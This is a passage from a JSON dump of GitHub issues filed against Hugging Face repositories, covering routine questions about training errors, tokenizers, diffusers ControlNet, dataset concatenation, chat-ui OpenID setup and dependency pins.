torch.autograd.set_detect_anomaly(True)\r\n----> 2 trainer_stats = trainer.train()\r\n\r\n3 frames\r\n[/usr/local/lib/python3.10/dist-packages/torch/autograd/graph.py](https://localhost:8080/#) in _engine_run_backward(t_outputs, *args, **kwargs)\r\n 767 unregister_hooks = _register_logging_hooks_on_whole_graph(t_outputs)\r\n 768 try:\r\n--> 769 return Variable._execution_engine.run_backward( # Calls into the C++ engine to run the backward pass\r\n 770 t_outputs, *args, **kwargs\r\n 771 ) # Calls into the C++ engine to run the backward pass\r\n\r\nRuntimeError: one of the variables needed for gradient computation has been modified by an inplace operation: [torch.cuda.FloatTensor [2, 256, 3584]], which is output 0 of MulBackward0, is at version 1; expected version 0 instead. Hint: the backtrace further above shows the operation that failed to compute its gradient. The variable in question was changed in there or anywhere later. Good luck!\r\n```\r\n\r\nWhat should I do?", "url": "https://github.com/huggingface/trl/issues/2196", "state": "closed", "labels": [ "\u2753 question", "\ud83c\udfcb SFT" ], "created_at": "2024-10-08T03:13:27Z", "updated_at": "2024-10-08T10:39:51Z", "user": "fishfree" }, { "repo": "huggingface/safetensors", "number": 532, "title": "Documentation about multipart safetensors", "body": "### Feature request\n\nAdd examples to documentation about handling with multipart safetensors files (`*-00001.safetensors`, `*-00002.safetensors`, etc). How to load/save them?\n\n### Motivation\n\nThis is widespread format but README and Docs don't contain enough information about it.\n\n### Your contribution\n\nCan't help by myself", "url": "https://github.com/huggingface/safetensors/issues/532", "state": "closed", "labels": [], "created_at": "2024-10-07T20:14:48Z", "updated_at": "2025-01-03T17:36:31Z", "comments": 6, "user": "attashe" }, { "repo": "huggingface/diffusers", "number": 9599, "title": "Why there is no LoRA only finetune example of FLUX.1?", "body": "**Is your feature request related to a problem? Please describe.**\r\nThe only example of LoRA finetune for FLUX.1 I discovered is here:\r\nhttps://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_flux.py\r\nwhich is a dreambooth example. The dreambooth is VRAM intensive and not useful for scenario that dataset is big enough and does not need regularization images.\r\n\r\n**Describe the solution you'd like.**\r\nA LoRA only example for FLUX.1\r\n\r\n**Describe alternatives you've considered.**\r\nProvide some tips for me to modify by myself.\r\n", "url": "https://github.com/huggingface/diffusers/issues/9599", "state": "closed", "labels": [], "created_at": "2024-10-07T06:22:54Z", "updated_at": "2024-10-09T12:48:32Z", "comments": 3, "user": "eeyrw" }, { "repo": "huggingface/chat-ui", "number": 1506, "title": "Add support for local models", "body": "## Describe your feature request\r\n\r\nI was looking for an open-source alternative to PocketPal, which allows to converse with local models on iOS and Android https://apps.apple.com/us/app/pocketpal-ai/id6502579498 and I was wondering if HuggingChat could be this alternative? The idea is to have an e2e open-source solution, providing e2e privacy.\r\n\r\nI hope I didn't miss anything in the app allowing to support this.\r\n\r\nThanks\r\n\r\n## Screenshots (if relevant)\r\n\r\n## Implementation idea\r\n\r\nI'm happy to help provided support from the community and the HuggingFace team. I have experience on web development, but not with running LLM on mobile.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1506", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-10-06T20:18:24Z", "updated_at": "2024-10-07T13:45:45Z", "comments": 3, "user": "arnaudbreton" }, { "repo": "huggingface/tokenizers", "number": 1644, "title": "How to build a custom tokenizer on top of a exsiting Llama 3.2 tokenizer?", "body": "Hi, \r\nI was trying to create a custom tokenizer for a different language which is not included in llama 3.2 tokenizer. \r\nI could not find exactly what tokenizer I can use from hf which is exact alternative to Llama's tokenizer [link](https://github.com/meta-llama/llama3/blob/main/llama/tokenizer.py), so that I will be able to train a new tokenizer. \r\n\r\nCurrently I am using following code to train a tokenizer, but final example does not match with the one Llama 3.2 has.\r\n\r\nI would be nice if anyone could share their experience of adapting a Llama model to a new language.\r\n\r\n```\r\nimport json\r\nimport argparse\r\n\r\nfrom datasets import load_dataset, concatenate_datasets\r\nfrom tokenizers import SentencePieceBPETokenizer\r\nfrom transformers import LlamaTokenizerFast, AutoTokenizer\r\n\r\nfrom tqdm import tqdm\r\nfrom typing import List\r\n\r\nhf_datasets = [\"yakhyo/uz-wiki\", \"yakhyo/uz-news\", \"agentlans/high-quality-english-sentences\"]\r\n\r\n\r\n\r\ndef normalize_text(text: str) -> str:\r\n \"\"\"\r\n Normalize Uzbek characters, replacing variations of o\u2018, o', o`, and \u2019 (curved apostrophe).\r\n \"\"\"\r\n return text.replace(\"\u2018\", \"'\").replace(\"`\", \"'\").replace(\"\u2019\", \"'\").replace(\"()\", \"\")\r\n\r\ndef prepare_datasets(datasets_list: List[str]):\r\n all_data = []\r\n for dataset_name in datasets_list:\r\n try:\r\n data = load_dataset(dataset_name)\r\n for split in [\"train\", \"test\", \"validation\"]:\r\n try:\r\n all_data.append(data[split])\r\n except KeyError:\r\n pass\r\n except:\r\n print(f\"dataset: `{dataset_name}` not found, skipping...\")\r\n\r\n concat_data = []\r\n for data in tqdm(all_data):\r\n data = data.map(lambda example: {\"text\": normalize_text(example[\"text\"])})\r\n data = data.remove_columns([col for col in data.column_names if col != \"text\"])\r\n concat_data.append(data)\r\n\r\n return concatenate_datasets(concat_data)\r\n\r\n\r\ndef main(args):\r\n\r\n dataset = prepare_datasets(hf_datasets)\r\n\r\n # select num_samples from the dataset\r\n dataset = dataset.shuffle(seed=42).select(range(len(dataset)))\r\n\r\n # Create a SentencePieceBPETokenizer\r\n tokenizer = SentencePieceBPETokenizer(\r\n replacement=\"\u0120\"\r\n )\r\n\r\n # Train the SentencePieceBPETokenizer on the dataset\r\n tokenizer.train_from_iterator(\r\n iterator=dataset['text'],\r\n vocab_size=args.vocab_size,\r\n show_progress=True,\r\n special_tokens=[\r\n \"\", \r\n \"\",\r\n \"\",\r\n \"\"\r\n ],\r\n )\r\n\r\n # Save the tokenizer\r\n tokenizer.save(\"new-sentencepiece-tokenizer.json\", pretty=True)\r\n\r\n # Load reference tokenizer\r\n if args.reference_tokenizer is not None:\r\n reference_tokenizer = AutoTokenizer.from_pretrained(args.reference_tokenizer)\r\n reference_tokenizer.save_pretrained(\"reference-tokenizer\")\r\n else:\r\n raise ValueError(\r\n \"No tokenizer name provided or no hub token provided. Try using --reference_tokenizer 'meta-llama/Llama-2-7b-hf'\")\r\n\r\n # Read and dump the json file for the new tokenizer and the reference tokenizer\r\n with open(\"new-sentencepiece-tokenizer.json\") as f:\r\n new_llama_tokenizer_json = json.load(f)\r\n\r\n with open(\"reference-tokenizer/tokenizer.json\") as f:\r\n reference_tokenizer_json = json.load(f)\r\n\r\n # Add the reference tokenizer's config to the new tokenizer's config\r\n new_llama_tokenizer_json[\"normalizer\"] = reference_tokenizer_json[\"normalizer\"]\r\n new_llama_tokenizer_json[\"pre_tokenizer\"] = reference_tokenizer_json[\"pre_tokenizer\"]\r\n new_llama_tokenizer_json[\"post_processor\"] = reference_tokenizer_json[\"post_processor\"]\r\n new_llama_tokenizer_json[\"decoder\"] = reference_tokenizer_json[\"decoder\"]\r\n new_llama_tokenizer_json[\"model\"]['fuse_unk'] = reference_tokenizer_json[\"model\"]['fuse_unk']\r\n new_llama_tokenizer_json[\"model\"]['byte_fallback'] = reference_tokenizer_json[\"model\"]['byte_fallback']\r\n\r\n # Dump the new tokenizer's config\r\n with open(\"new-sentencepiece-tokenizer.json\", \"w\") as f:\r\n json.dump(new_llama_tokenizer_json, f, indent=2, ensure_ascii=False)\r\n\r\n # Load the new tokenizer as a LlamaTokenizerFast\r\n new_llama_tokenizer = LlamaTokenizerFast(\r\n tokenizer_file=\"new-sentencepiece-tokenizer.json\",\r\n unk_token=\"\",\r\n unk_token_id=0,\r\n bos_token=\"\",\r\n bos_token_id=1,\r\n eos_token=\"\",\r\n eos_token_id=2,\r\n pad_token=\"\",\r\n pad_token_id=3,\r\n padding_side=\"right\",\r\n )\r\n\r\n # Save the new tokenizer\r\n new_llama_tokenizer.save_pretrained(\"new-llama-tokenizer\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=\"Llama Tokenizer using SentencePieceBPE\")\r\n\r\n parser.add_argument(\r\n \"--reference_tokenizer\",\r\n type=str,\r\n default=None,\r\n help=\"The name of the reference tokenizer to use\"\r\n )\r\n\r\n parser.ad", "url": "https://github.com/huggingface/tokenizers/issues/1644", "state": "closed", "labels": [ "training" ], "created_at": "2024-10-05T13:18:55Z", "updated_at": "2025-02-26T12:06:15Z", "user": "yakhyo" }, { "repo": "huggingface/datasets", "number": 7196, "title": "concatenate_datasets does not preserve shuffling state", "body": "### Describe the bug\r\n\r\nAfter concatenate datasets on an iterable dataset, the shuffling state is destroyed, similar to #7156 \r\n\r\nThis means concatenation cant be used for resolving uneven numbers of samples across devices when using iterable datasets in a distributed setting as discussed in #6623 \r\n\r\nI also noticed that the number of shards is the same after concatenation, which I found surprising, but I don't understand the internals well enough to know whether this is actually surprising or not\r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\nimport datasets\r\nimport torch.utils.data\r\n\r\n\r\ndef gen(shards):\r\n yield {\"shards\": shards}\r\n\r\n\r\ndef main():\r\n dataset1 = datasets.IterableDataset.from_generator(\r\n gen, gen_kwargs={\"shards\": list(range(25))} # TODO: how to understand this?\r\n )\r\n dataset2 = datasets.IterableDataset.from_generator(\r\n gen, gen_kwargs={\"shards\": list(range(25, 50))} # TODO: how to understand this?\r\n )\r\n dataset1 = dataset1.shuffle(buffer_size=1)\r\n dataset2 = dataset2.shuffle(buffer_size=1)\r\n print(dataset1.n_shards)\r\n print(dataset2.n_shards)\r\n\r\n dataset = datasets.concatenate_datasets(\r\n [dataset1, dataset2]\r\n )\r\n print(dataset.n_shards)\r\n # dataset = dataset1\r\n\r\n dataloader = torch.utils.data.DataLoader(\r\n dataset,\r\n batch_size=8,\r\n num_workers=0,\r\n )\r\n\r\n for i, batch in enumerate(dataloader):\r\n print(batch)\r\n print(\"\\nNew epoch\")\r\n\r\n dataset = dataset.set_epoch(1)\r\n\r\n for i, batch in enumerate(dataloader):\r\n print(batch)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n```\r\n\r\n### Expected behavior\r\n\r\nShuffling state should be preserved\r\n\r\n### Environment info\r\n\r\nLatest datasets", "url": "https://github.com/huggingface/datasets/issues/7196", "state": "open", "labels": [], "created_at": "2024-10-03T14:30:38Z", "updated_at": "2025-03-18T10:56:47Z", "comments": 1, "user": "alex-hh" }, { "repo": "huggingface/diffusers", "number": 9575, "title": "diffusers version update to 0.27.0 from 0.20.0, training code seems not work", "body": "I have trained an inpainting model using diffusers 0.20.0. The trained model works as expected. However, something seems wrong when I update the diffusers version to 0.27.0, while keeping the training code and other requirements the same. The training code runs successfully, but the inference outputs look like noise. Is there any point that should be noticed in this case?", "url": "https://github.com/huggingface/diffusers/issues/9575", "state": "closed", "labels": [], "created_at": "2024-10-03T14:30:21Z", "updated_at": "2024-10-15T08:58:36Z", "comments": 4, "user": "huangjun12" }, { "repo": "huggingface/transformers", "number": 33909, "title": "How to implement weight decay towards the pre-trained model?", "body": "Hello, let me one question.\r\n\r\nIf using HF Trainer for supervised fune-tuning, how do I implement penalizing the distance between starting and current weights? This was shown to be effective in https://arxiv.org/abs/1706.03610", "url": "https://github.com/huggingface/transformers/issues/33909", "state": "open", "labels": [ "Usage", "Feature request" ], "created_at": "2024-10-03T11:18:53Z", "updated_at": "2024-10-22T13:16:26Z", "user": "sedol1339" }, { "repo": "huggingface/datasets", "number": 7189, "title": "Audio preview in dataset viewer for audio array data without a path/filename", "body": "### Feature request\r\n\r\nHuggingface has quite a comprehensive set of guides for [audio datasets](https://huggingface.co/docs/datasets/en/audio_dataset). It seems, however, all these guides assume the audio array data to be decoded/inserted into a HF dataset always originates from individual files. The [Audio-dataclass](https://github.com/huggingface/datasets/blob/3.0.1/src/datasets/features/audio.py#L20) appears designed with this assumption in mind. Looking at its source code it returns a dictionary with the keys `path`, `array` and `sampling_rate`. \r\n\r\nHowever, sometimes users may have different pipelines where they themselves decode the audio array. This feature request has to do with wishing some clarification in guides on whether it is possible, and in such case how users can insert already decoded audio array data into datasets (pandas DataFrame, HF dataset or whatever) that are later saved as parquet, and still get a functioning audio preview in the dataset viewer. \r\n\r\nDo I perhaps need to write a tempfile of my audio array slice to wav and capture the bytes object with `io.BytesIO` and pass that to `Audio()`? \r\n\r\n### Motivation\r\n\r\nI'm working with large audio datasets, and my pipeline reads (decodes) audio from larger files, and slices the relevant portions of audio from that larger file based on metadata I have available. \r\n\r\nThe pipeline is designed this way to avoid having to store multiple copies of data, and to avoid having to store tens of millions of small files. \r\n\r\nI tried [test-uploading parquet files](https://huggingface.co/datasets/Lauler/riksdagen_test) where I store the audio array data of decoded slices of audio in an `audio` column with a dictionary with the keys `path`, `array` and `sampling_rate`. But I don't know the secret sauce of what the Huggingface Hub expects and requires to be able to display audio previews correctly. \r\n\r\n### Your contribution\r\n\r\nI could contribute a tool agnostic guide of creating HF audio datasets directly as parquet to the HF documentation if there is an interest. Provided you help me figure out the secret sauce of what the dataset viewer expects to display the preview correctly.", "url": "https://github.com/huggingface/datasets/issues/7189", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-10-02T16:38:38Z", "updated_at": "2024-10-02T17:01:40Z", "comments": 0, "user": "Lauler" }, { "repo": "huggingface/transformers.js", "number": 958, "title": "Zombies in memory - something is blocking (re)loading of Whisper after a page is closed and re-opened", "body": "### Question\n\nI've been trying to debug this issue all afternoon, but haven't gotten any further. The code runs on desktop, but not on Android Chrome.\r\n\r\nThis is with V3 Alpha 19.\r\n\r\n\"Screenshot\r\n\r\n\"Screenshot\r\n\r\n\"Screenshot\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/958", "state": "closed", "labels": [ "question" ], "created_at": "2024-10-02T14:10:27Z", "updated_at": "2024-10-18T12:47:17Z", "user": "flatsiedatsie" }, { "repo": "huggingface/diffusers", "number": 9567, "title": "[community] Improving docstrings and type hints", "body": "There are many instances in the codebase where our docstring/typing convention is not followed. We'd like to work on improving this with your help!\r\n\r\nOur convention looks like:\r\n\r\n```python3\r\ndef function_name(parameter_1: Union[str, List[str]], parameter_2: Optional[int] = None, parameter_3: float = 42.0) -> Civilization:\r\n r\"\"\"\r\n Function that creates a simulation.\r\n\r\n Args:\r\n parameter_1 (`str` or `List[str]`):\r\n Description of game level.\r\n parameter_2 (`int`, *optional*):\r\n Kardashev scale of civilization.\r\n parameter_3 (`float`, defaults to `42.0`):\r\n Difficulty scale.\r\n\r\n Returns:\r\n [`~simulations.objects.Civilization`]\r\n A civilization simulation with provided initialization parameters.\r\n \"\"\"\r\n```\r\n\r\nSome examples that don't follow the docstring convention are:\r\n- [this](https://github.com/huggingface/diffusers/blob/c4a8979f3018fbffee33304c1940561f7a5cf613/src/diffusers/models/embeddings.py#L89): missing explanations\r\n- [this](https://github.com/huggingface/diffusers/blob/33fafe3d143ca8380a9e405e7acfa69091d863fb/src/diffusers/pipelines/stable_diffusion_3/pipeline_stable_diffusion_3.py#L132): does not contain mixin-related documentation whereas as [this](https://github.com/huggingface/diffusers/blob/33fafe3d143ca8380a9e405e7acfa69091d863fb/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion.py#L154) does\r\n- [this](https://github.com/huggingface/diffusers/blob/c4a8979f3018fbffee33304c1940561f7a5cf613/src/diffusers/utils/import_utils.py#L672): function explanation after \"Args\", but should be before\r\n- [this](https://github.com/huggingface/diffusers/blob/c4a8979f3018fbffee33304c1940561f7a5cf613/src/diffusers/pipelines/deepfloyd_if/pipeline_output.py#L14): same reason as above\r\n- [this](https://github.com/huggingface/diffusers/blob/c4a8979f3018fbffee33304c1940561f7a5cf613/src/diffusers/models/embeddings.py#L518): incorrect indentation\r\n\r\nThere are also many places where docstrings are completely missing or inadequately explained. If you feel something needs an improvement, you can open a PR with your suggestions too! Additionally, type hints are not appropriate/correctly used at many occurrences and mismatch the accompanying docstrings - these could use an improvement too!\r\n\r\nPlease limit your PRs to changes to a single file in each PR. Changes must be only related to docstrings/type hints. Feel free to ping either @yiyixuxu, @stevhliu or me for reviews.", "url": "https://github.com/huggingface/diffusers/issues/9567", "state": "closed", "labels": [ "documentation", "good first issue", "contributions-welcome" ], "created_at": "2024-10-02T03:20:44Z", "updated_at": "2025-11-13T22:45:59Z", "comments": 16, "user": "a-r-r-o-w" }, { "repo": "huggingface/datasets", "number": 7186, "title": "pinning `dill<0.3.9` without pinning `multiprocess` ", "body": "### Describe the bug\n\nThe [latest `multiprocess` release](https://github.com/uqfoundation/multiprocess/releases/tag/0.70.17) requires `dill>=0.3.9` which causes issues when installing `datasets` without backtracking during package version resolution. Is it possible to add a pin for multiprocess so something like `multiprocess<=0.70.16` so that the `dill` version is compatible?\n\n### Steps to reproduce the bug\n\nNA\n\n### Expected behavior\n\nNA\n\n### Environment info\n\nNA", "url": "https://github.com/huggingface/datasets/issues/7186", "state": "closed", "labels": [], "created_at": "2024-10-01T22:29:32Z", "updated_at": "2024-10-02T06:08:24Z", "comments": 0, "user": "shubhbapna" }, { "repo": "huggingface/chat-ui", "number": 1499, "title": "Error 500 \"RPError\" | OpenID Connect + SafeNet Trusted Access (STA)", "body": "Hello,\r\n\r\nI would like to deploy OpenID Connect with SafeNet Trusted Access (STA).\r\n\r\nFrom this 3-minute video, I've done all the steps, except for OAuth.tools which I don't use :\r\nhttps://www.youtube.com/watch?v=hSWXFSadpQQ\r\n\r\nHere's my bash script that deploys the containers | ```deploy.sh``` :\r\n\r\n```bash\r\n#!/bin/bash\r\n\r\n# previous containers removed\r\nsudo docker rm -f ollama\r\nsudo docker rm -f mongodb\r\nsudo docker rm -f chat-ui\r\nsudo docker rm -f nginx\r\n\r\n# previous networks removed\r\nsudo docker network rm backend >/dev/null 2>&1\r\nsudo docker network rm proxy >/dev/null 2>&1\r\n\r\n# create networks\r\nsudo docker network create backend\r\nsudo docker network create proxy\r\n\r\n# ollama\r\nsudo docker run -d -p 11434:11434 -e HTTPS_PROXY=\"${HTTPS_PROXY}\" -v /home//chat-ui/ollama:/root/.ollama --name ollama --network backend ollama-with-ca\r\nsleep 5\r\nsudo docker exec ollama taskset -c 0-40 ollama run llama3.1\r\n\r\n# mongodb\r\nsudo docker run -d -p 27017:27017 -v mongodb-data:/data/db --name mongodb --network backend mongo:latest\r\n\r\n# chat-ui\r\nsudo docker run -d -p 3000:3000 -e HTTPS_PROXY=\"${HTTPS_PROXY}\" --mount type=bind,source=\"$(pwd)/.env.local\",target=/app/.env.local -v chat-ui:/data --name chat-ui --network backend ghcr.io/huggingface/chat-ui-db\r\nsudo docker network connect proxy chat-ui\r\n\r\n# nginx\r\nsudo docker run -d -p 80:80 -p 443:443 -v \"$(pwd)/nginx:/etc/nginx/conf.d\" -v \"$(pwd)/ssl:/etc/ssl\" --name nginx --network proxy nginx:latest\r\n```\r\n\r\nHere's my ```nginx``` configuration :\r\n\r\n```nginx\r\nserver {\r\n listen 80 default_server;\r\n listen [::]:80 default_server;\r\n server_name .fr;\r\n return 301 https://$host$request$uri;\r\n}\r\n\r\nserver {\r\n listen 443 ssl;\r\n server_name .fr; \r\n ssl_certificate /etc/ssl/chat-ui.crt;\r\n ssl_certificate_key /etc/ssl/chat-ui.key;\r\n\r\n proxy_connect_timeout 60;\r\n proxy_send_timeout 60;\r\n proxy_read_timeout 60;\r\n send_timeout 60;\r\n client_max_body_size 2G;\r\n proxy_buffering off;\r\n client_header_buffer_size 8k;\r\n\r\n location / {\r\n proxy_pass http://chat-ui:3000;\r\n proxy_set_header Host $host;\r\n proxy_set_header X-Real-IP $remote_addr;\r\n proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;\r\n proxy_set_header X-Forwarded-Proto $scheme;\r\n\r\n add_header 'Access-Control-Allow-Origin' 'https://.fr' always;\r\n }\r\n}\r\n```\r\n\r\nFinally, here's my ```.env.local``` using Llama3.1 8B model :\r\n\r\n```.env\r\nMONGODB_URL=mongodb://mongodb:27017\r\nHF_TOKEN=hf_*****\r\n\r\nOPENID_CONFIG=`{\r\n \"PROVIDER_URL\": \"https://idp.eu.safenetid.com/auth/realms/-STA/protocol/openid-connect/auth\",\r\n \"CLIENT_ID\": \"*****\",\r\n \"CLIENT_SECRET\": \"*****\",\r\n \"SCOPES\": \"openid profile\"\r\n}`\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"Ollama | Llama3.1\",\r\n \"id\": \"llama3.1-8b\",\r\n \"description\": \"llama3.1-8b\",\r\n \"chatPromptTemplate\": \"<|begin_of_text|>{{#if @root.preprompt}}<|start_header_id|>system<|end_header_id|>\\n\\n{{@root.preprompt}}<|eot_id|>{{/if}}{{#each messages}}{{#ifUser}}<|start_header_id|>user<|end_header_id|>\\n\\n{{content}}<|eot_id|>{{/ifUser}}{{#ifAssistant}}<|start_header_id|>assistant<|end_header_id|>\\n\\n{{content}}<|eot_id|>{{/ifAssistant}}{{/each}}<|start_header_id|>assistant<|end_header_id|>\\n\\n\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"<|end_of_text|>\", \"<|eot_id|>\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"ollama\",\r\n \"url\" : \"http://ollama:11434\",\r\n \"ollamaName\" : \"llama3.1:latest\"\r\n }\r\n ]\r\n }\r\n]`\r\n```\r\n\r\nAnd I got this error when I press on \"Login\" button : \r\n\r\n![login-button-pressed](https://github.com/user-attachments/assets/0e0846d1-8737-4b18-9607-51ee7f50adb9)\r\n\r\nWhen I do the command ```sudo docker logs chat-ui```, I see this line :\r\n\r\n```{\"level\":50,\"time\":1727703253975,\"pid\":30,\"hostname\":\"fe9d8f548283\",\"locals\":{\"sessionId\":\"3b700cd7b4efc2a2b47c0f13134904e01f01c3b7d6ff05c6726390e19ea5d431\"},\"url\":\"https://ia.chu-lyon.fr/login\",\"params\":{},\"request\":{},\"message\":\"Internal Error\",\"error\":{\"name\":\"RPError\"},\"errorId\":\"8d7d74e3-b12c-4c1e-9dc5-9847d5e61ea2\",\"status\":500}```\r\n\r\n**Note that by adding the ```OPENID_CONFIG``` (with probably incorrect data), the application stops working completely and I can't launch prompts or delete/edit existing ones !**\r\n\r\n**When I comment ```OPENID_CONFIG```, everything starts working properly again.**\r\n\r\nI don't really know what to put exactly, especially for ```PROVIDER_URL``` and ```SCOPES```.\r\n\r\nCan you help me to resolve this issue ?\r\n\r\nThanks in advance.", "url": "https://github.com/huggingface/chat-ui/issues/1499", "state": "open", "labels": [ "support" ], "created_at": "2024-09-30T12:54:16Z", "updated_at": "2024-09-30T12:57:51Z", "comments": 0, "user": "avirgos" }, { "repo": "huggingface/diffusers", "number": 9560, "title": "FP32 training for sd3 controlnet", "body": "Hi,\r\nI have been use `examples\\controlnet\\train_controlnet_sd3.py` for controlnet training for a while, and I have some confusion and would like your advice\r\n\r\n1. In the line 1097:\r\n`vae.to(accelerator.device, dtype=torch.float32)`\r\nIt seems we should use fp32 for VAE, but as far as I know, SD3 currently has no fp32 checkpoints, so does it really work if we populate fp16 into fp32?\r\n\r\n2. Before running the train script, `accelerate config` can specify whether to use mixed precision or not, since SD3 only has fp16 checkpoint at present, I don't know how to choose this option, whether to choose 'fp16' or 'no'.\r\n\r\nReally appreciate your advice!\r\n@sayakpaul @DavyMorgan \r\n", "url": "https://github.com/huggingface/diffusers/issues/9560", "state": "closed", "labels": [ "stale" ], "created_at": "2024-09-30T08:07:04Z", "updated_at": "2024-10-31T15:13:19Z", "comments": 11, "user": "xduzhangjiayu" }, { "repo": "huggingface/huggingface_hub", "number": 2578, "title": "What is the highest Python version currently supported?", "body": "### Describe the bug\n\nI utilized Hugging Face Spaces to construct my application, which was built using Gradio, zerogpuspace, and the link is: https://huggingface.co/spaces/tanbw/CosyVoice\r\nIn the readme.md, I specified the Python version as 3.8.9, but the version of Python that the application prints out is still 3.1. What is the highest Python version currently supported?\r\n![image](https://github.com/user-attachments/assets/3a6e426c-2cef-485e-b1b7-8a6edab1cd65)\r\n\r\n![image](https://github.com/user-attachments/assets/0afc1e2a-8014-4130-9426-1effeebbfbfa)\r\n\r\n![image](https://github.com/user-attachments/assets/9731452b-5535-450e-9ece-32741216ca79)\r\n\n\n### Reproduction\n\n_No response_\n\n### Logs\n\n_No response_\n\n### System info\n\n```shell\n- huggingface_hub version: 0.24.5\r\n- Platform: Linux-5.10.223-211.872.amzn2.x86_64-x86_64-with-glibc2.36\r\n- Python version: 3.10.13\r\n- Running in iPython ?: No\r\n- Running in notebook ?: No\r\n- Running in Google Colab ?: No\r\n- Token path ?: /home/user/.cache/huggingface/token\r\n- Has saved token ?: False\r\n- Configured git credential helpers: store\r\n- FastAI: N/A\r\n- Tensorflow: N/A\r\n- Torch: 2.0.1\r\n- Jinja2: 3.1.4\r\n- Graphviz: N/A\r\n- keras: N/A\r\n- Pydot: N/A\r\n- Pillow: 10.4.0\r\n- hf_transfer: 0.1.8\r\n- gradio: 4.44.0\r\n- tensorboard: N/A\r\n- numpy: 1.26.4\r\n- pydantic: 2.7.0\r\n- aiohttp: 3.10.0\r\n- ENDPOINT: https://huggingface.co\r\n- HF_HUB_CACHE: /home/user/.cache/huggingface/hub\r\n- HF_ASSETS_CACHE: /home/user/.cache/huggingface/assets\r\n- HF_TOKEN_PATH: /home/user/.cache/huggingface/token\r\n- HF_HUB_OFFLINE: False\r\n- HF_HUB_DISABLE_TELEMETRY: False\r\n- HF_HUB_DISABLE_PROGRESS_BARS: None\r\n- HF_HUB_DISABLE_SYMLINKS_WARNING: False\r\n- HF_HUB_DISABLE_EXPERIMENTAL_WARNING: False\r\n- HF_HUB_DISABLE_IMPLICIT_TOKEN: False\r\n- HF_HUB_ENABLE_HF_TRANSFER: True\r\n- HF_HUB_ETAG_TIMEOUT: 10\r\n- HF_HUB_DOWNLOAD_TIMEOUT: 10\n```\n", "url": "https://github.com/huggingface/huggingface_hub/issues/2578", "state": "closed", "labels": [ "bug" ], "created_at": "2024-09-29T14:37:38Z", "updated_at": "2024-09-30T07:05:29Z", "user": "tanbw" }, { "repo": "huggingface/diffusers", "number": 9555, "title": "[Flux Controlnet] Add control_guidance_start and control_guidance_end", "body": "It'd be nice to have `control_guidance_start` and `control_guidance_start` parameters added to flux Controlnet and Controlnet Inpainting pipelines.\r\n\r\nI'm currently making experiments with Flux Controlnet Inpainting but the results are poor even with a `controlnet_conditioning_scale` set to 0.6. \r\n\r\nI have to set `controlnet_conditioning_scale` to 0.4 to have non broken results.\r\n\r\nMaybe giving more control with the guidance start and end would help reach better results ?\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/9555", "state": "closed", "labels": [ "help wanted", "Good second issue", "contributions-welcome" ], "created_at": "2024-09-29T12:37:39Z", "updated_at": "2024-10-10T12:29:03Z", "comments": 8, "user": "simbrams" }, { "repo": "huggingface/hub-docs", "number": 1435, "title": "How to check if a space is duplicated from another one using HF API?", "body": "I cannot find any related specifications in the documentation...Thanks!", "url": "https://github.com/huggingface/hub-docs/issues/1435", "state": "open", "labels": [], "created_at": "2024-09-28T23:52:08Z", "updated_at": "2025-01-16T17:08:34Z", "user": "zhimin-z" }, { "repo": "huggingface/diffusers", "number": 9551, "title": "How to use x-labs flux controlnet models in diffusers?", "body": "### Model/Pipeline/Scheduler description\r\n\r\nThe following controlnets are supported in Comfy UI, but was wondering how we can use these in diffusers as well for developers. Afaik, there is no from_single_file method for FluxControlNet to load the safetensors?\r\n\r\n### Open source status\r\n\r\n- [x] The model implementation is available.\r\n- [x] The model weights are available (Only relevant if addition is not a scheduler).\r\n\r\n### Provide useful links for the implementation\r\n\r\nhttps://huggingface.co/XLabs-AI/flux-controlnet-canny\r\nhttps://huggingface.co/XLabs-AI/flux-controlnet-canny-v3\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9551", "state": "closed", "labels": [], "created_at": "2024-09-28T20:01:15Z", "updated_at": "2024-09-29T06:59:46Z", "user": "neuron-party" }, { "repo": "huggingface/text-generation-inference", "number": 2583, "title": "How to turn on the KV cache when serve a model?", "body": "### System Info\n\nTGI 2.3.0\n\n### Information\n\n- [ ] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nThe TTFT is really slower than VLLM. Can't be improved? if so how to turn on the KV cache when launch a model?\r\n\r\n```\r\nmodel=HuggingFaceH4/zephyr-7b-beta\r\n# share a volume with the Docker container to avoid downloading weights every run\r\nvolume=$PWD/data\r\n\r\ndocker run --gpus all --shm-size 1g -p 8080:80 -v $volume:/data \\\r\n ghcr.io/huggingface/text-generation-inference:2.3.0 --model-id $model\r\n```\n\n### Expected behavior\n\nImprove the TTFT and latency ", "url": "https://github.com/huggingface/text-generation-inference/issues/2583", "state": "open", "labels": [], "created_at": "2024-09-28T19:32:15Z", "updated_at": "2024-10-25T12:47:02Z", "user": "hahmad2008" }, { "repo": "huggingface/transformers.js", "number": 948, "title": "Getting Local models/wasm working with Create React App", "body": "### Question\n\nI realize there's been a lot of talk about this in other issues, but I'm trying to gather if getting local-only model and wasm files will work with Create React App. I'm using `WhisperForConditionalGeneration` from `@huggingface/transformers` version `3.0.0-alpha.9`. \r\n\r\nMy setup:\r\n```\r\nenv.allowRemoteModels = false;\r\nenv.allowLocalModels = true;\r\nenv.backends.onnx.wasm.wasmPaths = process.env.PUBLIC_URL + \"/dictation/\";\r\nenv.localModelPath = process.env.PUBLIC_URL + \"/dictation/models/\";\r\n```\r\n... and in my `{packagename}/public/models` folder I've 